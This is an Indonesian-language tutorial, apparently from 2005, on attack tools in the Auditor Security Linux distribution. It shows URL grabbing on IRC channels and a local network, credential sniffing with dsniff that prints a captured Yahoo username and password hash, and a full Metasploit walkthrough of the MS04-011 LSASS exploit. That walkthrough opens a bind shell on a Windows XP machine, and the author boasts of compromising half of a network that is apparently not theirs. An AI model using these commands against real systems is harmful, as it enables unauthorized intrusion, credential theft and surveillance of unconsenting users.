Auditor security merupakan sebuah system operasi yang bersifat live-system berbasiskan pada knopix.
New Page 1
Menurut penciptanya yang dituliskan pada http://remote-exploit.org , linux
Auditor Security diciptakan untuk
memenuhi kebutuhan para excellent-user yang dikombinasikan dengan toolset
yang optimal serta penggunakan
yang user friendly. Program – program open source pada auditor security
menawarkan toolset yang komplit
untuk meng-analysis keamanan sebuah system, byte per byte.
Dalam tulisan ini akan dibahas sebagian dari security tool set yang terdapat
pada linux Auditor Security.
A. Grabbing URL
Yang dimaksusd grabbing URL adalah mendapatkan alamat URL yang dikunjungi
oleh seseorang tanpa ataupun sepengetahuan
dari orang tersebut. Di bawah akan dibahas mengenai grabbing URL pada suatu
channel IRC dan pada jaringan lokal yang
terhubung dengan internet.
1. Grabbing URL pada channel IRC
Untuk melakukan grabbing URL pada channel IRC bisa dilakukan dengan
menggunkan XCHAT yang telah tersedia secara bult-in
pada linux auditor. Langkah pertama tentu saja kita harus join ke channel
tertentu. Setelah join ke channel tertentu
langkah selanjutnya klik tab Windows kemudian pilih URL Grabber. Tunggu
beberapa saat, maka jika ada salah satu user yang
tergabung pada channel tersebut membuka sebuah URL, list dari URL Grabber
akan bertambah.
Berikut ini hasil grabbing URL yang penulis lakukan pada channel : #hnet,
#skb50, #indonona, #echo, #k-elektronik, #bandung
pada server dalnet tanggal 1 September 2005.
ftp.orghttp://echo.or.id
http://irc.jraxis.com/dalnet/default/
http://kline.dal.net/exploits/akills.htm#ma
http://kline.dal.net/exploits/akills.htm#ma)))
http://kline.dal.net/massads/mup.htm
http://kline.dal.net/proxy/
http://miranda-im.org
http://tiongkokmusic.com:2222/listen.pls
http://unut.hollosite.com
http://valueshells.com
http://valueshells.com/disc.html
http://www.dal.net/
http://www.dal.net/aup/
http://www.equinix.net
http://www.kecoak.or.id
http://www.malanghack.net/
http://www.rayofshadow.or.id
http://www.valueshells.com
irc.hackerszone.orgirc.vsnl.com
www.balihack.or.idwww.bandung-dal.net
WwW.BaNdUnG.tKwww.dal.net/proxies
www.jraxis.comwww.malanghack.net
WwW.PsYcHoPeD.InFowww.scoopsite.com
www.superask.netwww.VALUESHELLS.com
www.ValueShells.comwww.valueshells.com
www.valueshells.comwww.w0nk.org
www.zone-h.org/en/defacements/mirror/id=2840693/>
www.zone-h.org/en/defacements/mirror/id=2840696/>
Daftar URL diatas merupakan daftar dari URL-URL yang dikunjungi para chatter
pada channel – channel diatas.
Kelemahan dari XCHAT yaitu XCHAT belum mampu secara spesifik mengetahui URL
yang dikunjungi tiap chatter.
2. Grabbing URL Pada Jaringan Lokal Yang Terhubung Pada Internet
Selain grabbing URL pada suatu channel IRC kita juga bisa melakukan
grabbing URL pada jaringan lokal yang terhubung
pada internet. Untuk melakukanya kita bisa menggunakan URL Snarf. Untuk
menjalankan URL Snarf ketikan perintah berikut
pada konsole :
hyraxz@chidori~dove# urlsnarf -i eth0 > ./grabMeBabe.txt
Setelah URL Snarf berhasil dijalankan maka tugas kita selanjutnya adalah
tinggal tidur dan membuka hasil grabbing
keesokan hari.Berikut ini satu baris potongan dari hasil grabbing URL yang
berhasil penulis capture, penulis hanya
menunjukan 1 baris dari 994 baris hasil grabbing yang didapat mulai dari jam
00:15:37 sampai 06:21:10 pada
tanggal 02/Sep/2005.
192.168.10.5 - - [02/Sep/2005:05:38:37 -0400] "GET
http://www.friendster.com/friendrequests.php?lastact=approve&sc=933
HTTP/1.1" - -
"http://www.friendster.com/friendrequests.php?statpos=homealerts"
"Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.7.5) Gecko/20041128 Firefox/1.0 (Debian package 1.0-4)"
Dari hasil grabbing tersebut maka kita bisa mengambil suatu analisa bahwa
komputer dengan IP 192.168.10.5
pada [02/Sep/2005:05:38:37 -0400] dengan menggunakan methode GET sedang
mengakses www.friendster.com dan kemungkinan
besar user tersebut sedang meng-approve friend request. Sangat dimungkinkan
browser dari user tersebut adalah
Mozzila/5.0 dengan mamakai sistem operasi linux.
B. Sniffing Menggunakan DSNIFF
Sniffing merupakan usaha yang dilakukan untuk memperoleh suatu informasi
tertentu dalam suatu network dangan jalan
meng-capture paket – paket data yang ada pada suatu network dan kemudian
menganalisinya untuk diambil informasinya
yang dianggap penting. Dsiniff merupakan suatu tool sniffing yang telah
tersedia pada linux auditor security.
Untuk memulai sniffing ketikan perintah berikut ini:
hyraxz@chidori~dove# dsniff –i eth0 –W /mnt/hda5/passwd_HhAN.db
perintah diatas akan memerintahkan dsniff untuk meng-capture paket - paket
yang melintasi eth0 dan menuliskan hasilnya
pada sebuah file dengan nama passwd_HhAN.db yang disimpan pada directory
/mnt/hda5/.
Untuk membaca hasilnya gunakan perintah berikut ini:
hyraxz@chidori~ dove# dsniff -r /mnt/hda5/passwd_HhAN.db
Atau kalau kita ingin merubahnya dalam format ASCII sehingga file tersebut
bisa dibuka menggunakan notepad saat di Windows,
ketik perintah berikut :
hyraxz@chidori~dove# dsniff -r /mnt/hda5/passwd_HhAN.db >
/mnt/hda5/GetDownEnemy.txt
Berikut ini merupakan file ASCII hasil dari sniffing yang berhasil penulis
documentasikan :
09/02/05 04:58:42 tcp 192.168.10.7.1183 -> p2.rd.scd.yahoo.com.80 (http)GET
/reg/login1/newym_nouc/lisu/login/us/ym/*http://login.yahoo.com/config/login?.tries=1&.src=ym&.md5=&.hash=&.js=1&.
last=&promo=&.intl=us&.bypass=&.partner=&.u=b261flt1heuai&.v=0&.challenge=Ymjr9vf35ZRMTV9YkEFy0vhTsQz0&.yplus=&.
emailCode=&pkg=&stepid=&.ev=&hasMsgr=1&.chkP=Y&.done=http%3A//mail.yahoo.com&login=rip_zombie
&passwd=ace61b359fa543aceccf111dbd767e74&.persistent=&.hash=1&.md5=1
HTTP/1.1Host: us.rd.yahoo.com
Berikut analysis dari hasil sniffing di atas:
1. Sniffing dilakukan pada tgl 02 September 2005 jam 04:58:42. Sniffing
dilakukan pada koneksi TCP antara host dengan
IP 192.168.10.7:1183 dengan server yahoo pada p2.rd.scd.yahoo.com:80
denagan memakai protokol HTTP.
2. User Name untuk login ke server e-mail dari user tersebut adalah
rip_zombie dengan password hasil enkripsi
MD5 “ace61b359fa543aceccf111dbd767e74” (tanpa tanda petik).
3. Server mail yahoo menggunakan methode enkripsi MD5.
C. Remote Exploit
Remote exploit adalah suatu program yang dijalankan pada computer attacker,
digunakan untuk menginjeksi komputer target
sehingga attacker memperoleh hak akses lebih dari yang diijinkan tanpa
ataupun sepengetahuan dari korban.
Linux Auditor Security menyediakan tool tersebut dengan nama Metasploit.
Menyusup di Jaringan SKB50 Menggunakan Metasploit
Sebelum memulainya tentu saja komputer attaccker harus di set IP-nya sesuai
dengan IP dari jaringan SKB50. berikut ini
konfigurasi IP dari komputer attacker yang telah disesuaikan dengan
konfigurasi IP pada jaringan SKB50.
hyraxz@chidori~dove# ifconfig –eth0 192.168.0.10 netmask 255.255.255.0
hyraxz@chidori~dove# ifconfig
eth0 Link encap:Ethernet HWaddr 00:E0:18:F3:9A:D0
inet addr:192.168.0.10 Bcast:192.168.0.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:712 errors:0 dropped:0 overruns:0 frame:0
TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:69398 (67.7 KiB) TX bytes:595 (595.0 b)
Interrupt:5 Base address:0x9800
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:10 errors:0 dropped:0 overruns:0 frame:0
TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:500 (500.0 b) TX bytes:500 (500.0 b)
Selanjutnya ketikan perintah dibawah ini untuk memanggil console metasploit
:
hyraxz@chidori~dove# cd /opt/auditor/metasploit
hyraxz@chidori~dove# ./msfconsole
jika berhasil maka akan muncul tulisan seperti berikut ini :
888 888 d8b888
888 888 Y8P888
888 888 888
88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888
888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888
888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
888
888
888
+ -- --=[ msfconsole v2.4 [75 exploits - 75 payloads]
msf >
untuk memulai penggunakanya ketikan perintah-perintah dibawah ini:
msf > show exploits
Metasploit Framework Loaded Exploits
====================================
| 3com_3cdaemon_ftp_overflow |
3Com 3CDaemon FTP Server Overflow |
|
Credits afp_loginext
aim_goaway apache_chunked_win32
arkeia_agent_accessarkeia_type77_macos
arkeia_type77_win32backupexec_ns
bakbone_netvault_heapblackice_pam_icq
cabrightstor_discocabrightstor_disco_servicepc
cabrightstor_uniagentcalicclnt_getconfig
calicserv_getconfigdistcc_exec
exchange2000_xexch50globalscapeftp_user_input
ia_webmailicecast_header
iis40_htriis50_printer_overflow
iis50_webdav_ntdlliis_fp30reg_chunked
iis_nsiislog_postiis_source_dumper
iis_w3who_overflowimail_imap_delete
imail_ldapirix_lpsched_exec
lsass_ms04_011maxdb_webdbm_get_overflow
mercantec_softcart minishare_get_overflow
msasn1_ms04_007_killbillmsmq_deleteobject_ms05_017
msrpc_dcom_ms03_026 mssql2000_preauthentication
mssql2000_resolutionnetterm_netftpd_user_overflow
openview_omnibackoracle9i_xdb_ftp
oracle9i_xdb_ftp_passpayload_handler
poptop_negative_readrealserver_describe_linux
samba_nttrans samba_trans2open
samba_trans2open_osxsamba_trans2open_solsparc
sambar6_search_resultsseattlelab_mail_55
sentinel_lm7_overflowservu_mdtm_overflow
smb_sniffersolaris_dtspcd_noir
solaris_kcms_readfilesolaris_lpd_exec
solaris_sadmind_execsolaris_snmpxdmid
solaris_ttypromptsquid_ntlm_authenticate
svnserve_datetrackercam_phparg_overflow
uow_imap4_copyuow_imap4_lsub
ut2004_secure_linuxut2004_secure_win32
warftpd_165_passwarftpd_165_user
webstar_ftp_userwindows_ssl_pct
wins_ms04_045wsftp_server_503_mkd |
Metasploit Framework Credits AppleFileServer LoginExt PathName
Overflow
AOL Instant Messenger goaway OverflowApache Win32 Chunked
Encoding
Arkeia Backup Client Remote AccessArkeia Backup Client Type 77
Overflow (Mac OS X)
Arkeia Backup Client Type 77 Overflow (Win32)Veritas Backup Exec
Name Service Overflow
BakBone NetVault Remote Heap OverflowISS PAM.dll ICQ Parser
Buffer Overflow
CA BrightStor Discovery Service OverflowCA BrightStor Discovery
Service SERVICEPC Overflo
CA BrightStor Universal Agent OverflowCA License Client GETCONFIG
Overflow
CA License Server GETCONFIG OverflowDistCC Daemon Command
Execution
Exchange 2000 MS03-46 Heap OverflowGlobalSCAPE Secure FTP Server
user input overflow
IA WebMail 3.x Buffer OverflowIcecast (<= 2.0.1) Header Overwrite
(win32)
IIS 4.0 .HTR Buffer OverflowIIS 5.0 Printer Buffer Overflow
IIS 5.0 WebDAV ntdll.dll OverflowIIS FrontPage fp30reg.dll
Chunked Overflow
IIS nsiislog.dll ISAPI POST OverflowIIS Web Application Source
Code Disclosure
IIS w3who.dll ISAPI OverflowIMail IMAP4D Delete Overflow
IMail LDAP Service Buffer OverflowIrix lpsched Command Execution
Microsoft LSASS MSO4-011 OverflowMaxDB WebDBM GET Buffer Overflow
Mercantec SoftCart CGI OverflowMinishare 1.41 Buffer Overflow
Microsoft ASN.1 Library Bitstring Heap OverflowMicrosoft Message
Queueing Service MSO5-017
Microsoft RPC DCOM MSO3-026MSSQL 2000/MSDE Hello Buffer Overflow
MSSQL 2000/MSDE Resolution OverflowNetTerm NetFTPD USER Buffer
Overflow
HP OpenView Omniback II Command ExecutionOracle 9i XDB FTP UNLOCK
Overflow (win32)
Oracle 9i XDB FTP PASS Overflow (win32)Metasploit Framework
Payload Handler
Poptop Negative Read OverflowRealServer Describe Buffer Overflow
Samba Fragment Reassembly OverflowSamba trans2open Overflow
Samba trans2open Overflow (Mac OS X)Samba trans2open Overflow
(Solaris SPARC)
Sambar 6 Search Results Buffer OverflowSeattle Lab Mail 5.5 POP3
Buffer Overflow
SentinelLM UDP Buffer OverflowServ-U FTPD MDTM Overflow
SMB Password Capture ServiceSolaris dtspcd Heap Overflow
Solaris KCMS Arbitary File ReadSolaris LPD Command Execution
Solaris sadmind Command ExecutionSolaris snmpXdmid AddComponent
Overflow
Solaris in.telnetd TTYPROMPT Buffer OverflowSquid NTLM
Authenticate Overflow
Subversion Date SvnserveTrackerCam PHP Argument Buffer Overflow
University of Washington IMAP4 COPY OverflowUniversity of
Washington IMAP4 LSUB Overflow
Unreal Tournament 2004 "secure" Overflow (Linux)Unreal Tournament
2004 "secure" Overflow (Win32)
War-FTPD 1.65 PASS OverflowWar-FTPD 1.65 USER Overflow
WebSTAR FTP Server USER OverflowMicrosoft SSL PCT MS04-011
Overflow
Microsoft WINS MS04-045 Code ExecutionWS-FTP Server 5.03 MKD
Overflow |
msf > use lsass_ms04_011
msf lsass_ms04_011 > show payloads
Metasploit Framework Usable Payloads
====================================
|
win32_adduser win32_bind
win32_bind_dllinjectwin32_bind_meterpreter
win32_bind_stgwin32_bind_stg_upexec
win32_bind_vncinjectwin32_exec
win32_passivexwin32_passivex_meterpreter
win32_passivex_stgwin32_passivex_vncinject
win32_reversewin32_reverse_dllinject
win32_reverse_meterpreterwin32_reverse_ord
win32_reverse_ord_vncinjectwin32_reverse_stg
win32_reverse_stg_upexecwin32_reverse_vncinject |
Windows Execute net user /ADD Windows Bind Shell
Windows Bind DLL InjectWindows Bind Meterpreter DLL Inject
Windows Staged Bind ShellWindows Staged Bind Upload/Execute
Windows Bind VNC Server DLL InjectWindows Execute Command
Windows PassiveX ActiveX Injection PayloadWindows PassiveX
ActiveX Inject Meterpreter Payload
Windows Staged PassiveX ShellWindows PassiveX ActiveX Inject VNC
Server Payload
Windows Reverse ShellWindows Reverse DLL Inject
Windows Reverse Meterpreter DLL InjectWindows Staged Reverse
Ordinal Shell
Windows Reverse Ordinal VNC Server InjectWindows Staged Reverse
Shell
Windows Staged Reverse Upload/ExecuteWindows Reverse VNC Server
Inject |
msf lsass_ms04_011 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf lsass_ms04_011(win32_bind) > set RHOST 192.168.0.27
RHOST -> 192.168.0.27
msf lsass_ms04_011(win32_bind) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- ------ ------------ ------------------
required RHOST 192.168.0.19 The target address
required RPORT 139 The target port
Payload: Name Default Description
-------- -------- -------
------------------------------------------
required EXITFUNC thread Exit technique: "process", "thread",
"seh"
required LPORT 4444 Listening port for bind shell
Target: Automatic
msf lsass_ms04_011(win32_bind) > exploit
RHOST -> 192.168.0.27
msf lsass_ms04_011(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Detected a Windows XP target (KICKS)
[*] Windows XP may require two attempts
[*] Sending 8 DCE request fragments...
[*] Sending the final DCE fragment
[*] Got connection from 192.168.0.10:1382 <-> 192.168.0.27:4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32> netstat -a
netstat -a
Active Connections
|
Protocol |
Local Address |
Foreign Address |
State |
|
TCP TCP
TCPTCP
TCPTCP
TCPTCP
TCPTCP
TCPTCP
TCPTCP
UDPUDP
UDPUDP
UDPUDP
UDPUDP |
kicks:epmap kicks:microsoft-ds
kicks:1025kicks:1056
kicks:1090kicks:1095
kicks:1098kicks:1130
kicks:4444kicks:5000
kicks:netbios-ssnkicks:1162
kicks:1169kicks:4444
kicks:microsoft-dskicks:isakmp
kicks:ntp kicks:1900
kicks:ntpkicks:netbios-ns
kicks:netbios-dgmkicks:1900 |
0.0.0.0:0 0.0.0.0:0
0.0.0.0:0 0.0.0.0:0
0.0.0.0:0 0.0.0.0:0
0.0.0.0:0 0.0.0.0:0
0.0.0.0:0 0.0.0.0:0
0.0.0.0:0 0.0.0.0:0
0.0.0.0:0 192.168.0.10:1382
*:* *:*
*:* *:*
*:* *:*
*:* *:* |
LISTENING LISTENING
LISTENING LISTENING
LISTENING LISTENING
LISTENING LISTENING
LISTENING LISTENING
LISTENING LISTENING
LISTENING ESTABLISHED |
^c
Caught interrupt, exit connection? [y/n]y
msf lsass_ms04_011(win32_bind) >
Analisa dari hasil aktivitas diatas adalah sebagai berikut :
metasploit meng-attack korban melalui port 139 kemudian memasukan payload
yang akan membangun hubungan antara korban
dengan attacker dengan menggunakan mode koneksi TCP, dimana hubungan
dilakukan melalui port 4444 pada sisi korban
dan port 1382 pada sisi attacker.Setelah bind port antara attacker dengan
korban terbentuk maka attacker menguasai
sepenuhnya aktifitas dari komputer korban. Dari 12 komputer yang hidup saat
analisa dilakukan pada jaringan lokal
SKB50 6 buah komputer mampu di tembus dengan menggunakan metasploit, ini
berarti bahwa 50% jaringan SKB50 pada saat
itu ada di tangan attacker ;).
Daftar Pustaka :
Fwerd (Kecoak Elektronik), Memanen Password Di Jaringan Lokal dengan dsniff,
Terbitan Online Kecoak Elektronik http://k-elektronik.co.id.
From Exploit, http://new.remote-exploit.org/index.php/Auditor_main.
|